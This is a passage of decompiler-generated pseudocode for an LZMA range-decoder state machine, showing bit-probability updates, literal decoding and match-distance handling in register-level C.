                          												_t67 = _t621 - 0x70;
                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                          												if( *(_t621 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t540 =  *_t614;
                          												_t597 = _t540 & 0x0000ffff;
                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          												if( *(_t621 - 0xc) >= _t573) {
                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          													 *(_t621 - 0x40) = 1;
                          													_t541 = _t540 - (_t540 >> 5);
                          													 *_t614 = _t541;
                          												} else {
                          													 *(_t621 - 0x10) = _t573;
                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          												}
                          												if( *(_t621 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												goto L0;
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t258;
                          												0 | _t258 = _t258 + _t258 + 9;
                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          												goto L75;
                          											case 0xa:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xb;
                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												L88:
                          												__ecx =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x2c) = __eax;
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												L89:
                          												__eax =  *(__ebp - 4);
                          												 *(__ebp - 0x80) = 0x15;
                          												__eax =  *(__ebp - 4) + 0xa68;
                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          												goto L68;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												L68:
                          												_t614 =  *(_t621 - 0x58);
                          												 *(_t621 - 0x84) = 0x12;
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t621 - 0x88) = _t542;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t621 - 0x88) = _t542;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L79;
                          											case 0x1b:
                          												L75:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
